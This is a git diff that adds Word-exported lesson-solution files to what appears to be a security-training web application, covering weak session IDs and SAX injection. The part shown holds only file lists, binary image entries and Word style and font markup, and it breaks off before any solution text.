+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/filelist.xml b/main/project/WebContent/lesson_solutions/WeakSessionID_files/filelist.xml
new file mode 100644
index 000000000..082acf789
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WeakSessionID_files/filelist.xml
@@ -0,0 +1,25 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../WeakSessionID.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image020.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image021.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image022.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image023.jpg"/>
+ <o:File HRef="image024.jpg"/>
+ <o:File HRef="image010.png"/>
+ <o:File HRef="image025.jpg"/>
+ <o:File HRef="image012.png"/>
+ <o:File HRef="image026.jpg"/>
+ <o:File HRef="image014.png"/>
+ <o:File HRef="image027.jpg"/>
+ <o:File HRef="image016.png"/>
+ <o:File HRef="image028.jpg"/>
+ <o:File HRef="image018.png"/>
+ <o:File HRef="image029.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image001.png b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image001.png
new file mode 100644
index 000000000..560ca80c0
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image003.png b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image003.png
new file mode 100644
index 000000000..f0100265e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image005.png b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image005.png
new file mode 100644
index 000000000..c42733b93
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image007.png b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image007.png
new file mode 100644
index 000000000..a34c6751c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image010.png b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image010.png
new file mode 100644
index 000000000..0c6fe9313
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image010.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image012.png b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image012.png
new file mode 100644
index 000000000..46b787813
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image012.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image014.png b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image014.png
new file mode 100644
index 000000000..bde7fd0bd
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image014.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image016.png b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image016.png
new file mode 100644
index 000000000..d25bc4167
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image016.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image018.png b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image018.png
new file mode 100644
index 000000000..bb0344681
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image018.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image020.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image020.jpg
new file mode 100644
index 000000000..b825cea5d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image020.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image021.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image021.jpg
new file mode 100644
index 000000000..a7fd9b516
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image021.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image022.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image022.jpg
new file mode 100644
index 000000000..b38898623
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image022.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image023.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image023.jpg
new file mode 100644
index 000000000..0c3616032
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image023.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image024.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image024.jpg
new file mode 100644
index 000000000..632ca5835
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image024.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image025.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image025.jpg
new file mode 100644
index 000000000..0ab015bbb
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image025.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image026.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image026.jpg
new file mode 100644
index 000000000..bc5a7fe32
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image026.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image027.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image027.jpg
new file mode 100644
index 000000000..7bbdb5f09
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image027.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image028.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image028.jpg
new file mode 100644
index 000000000..4530c95f9
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image028.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/image029.jpg b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image029.jpg
new file mode 100644
index 000000000..112d5259b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/image029.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/themedata.thmx b/main/project/WebContent/lesson_solutions/WeakSessionID_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakSessionID_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection.html b/main/project/WebContent/lesson_solutions/WsSAXInjection.html
new file mode 100644
index 000000000..ec98e6c30
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WsSAXInjection.html
@@ -0,0 +1,916 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/WsSAXInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WsSAXInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>43</o:TotalTime>
+  <o:Created>2007-07-11T14:33:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:21:00Z</o:LastSaved>
+  <o:Pages>3</o:Pages>
+  <o:Words>457</o:Words>
+  <o:Characters>2607</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>21</o:Lines>
+  <o:Paragraphs>6</o:Paragraphs>
+  <o:CharactersWithSpaces>3058</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/WsSAXInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WsSAXInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
